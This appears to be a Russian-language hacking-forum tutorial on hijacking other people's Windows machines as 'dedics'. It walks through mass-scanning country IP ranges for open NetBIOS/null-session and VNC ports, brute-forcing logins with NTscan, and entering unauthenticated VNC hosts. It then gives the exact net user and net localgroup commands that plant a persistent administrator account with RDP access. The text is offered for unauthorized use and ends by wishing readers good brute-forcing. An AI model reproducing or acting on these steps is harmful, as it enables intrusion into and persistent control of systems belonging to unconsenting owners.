и так приступим .....
Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.
Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его (Angry)
чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде
Code
ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
отсюда видно что запускается наш сканер ipscan.exe сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt
Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер (Parser)
закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
диапазоны по странам можно смотреть тут Ip rang
теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать
после скана одного диапазона создастся файлег в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов
Для удобства парсинга результатов angry был написан еще 1 парсер качаем его (Parser 2)
закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900
И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его (NTscan)
думаю все разберутся как его юзать.
а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его (VNCmass)
VNCmasss позволит приконектится к бажному VNC деду без авторизации .
Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку
Code
cmd
net user user pass /add
net localgroup Administrator user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
net user user pass /add
net localgroup Administrator user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком
в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку
Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.
Удачного всем брута и скана
Спасибо за внимание .
Realix
Софт к статье:
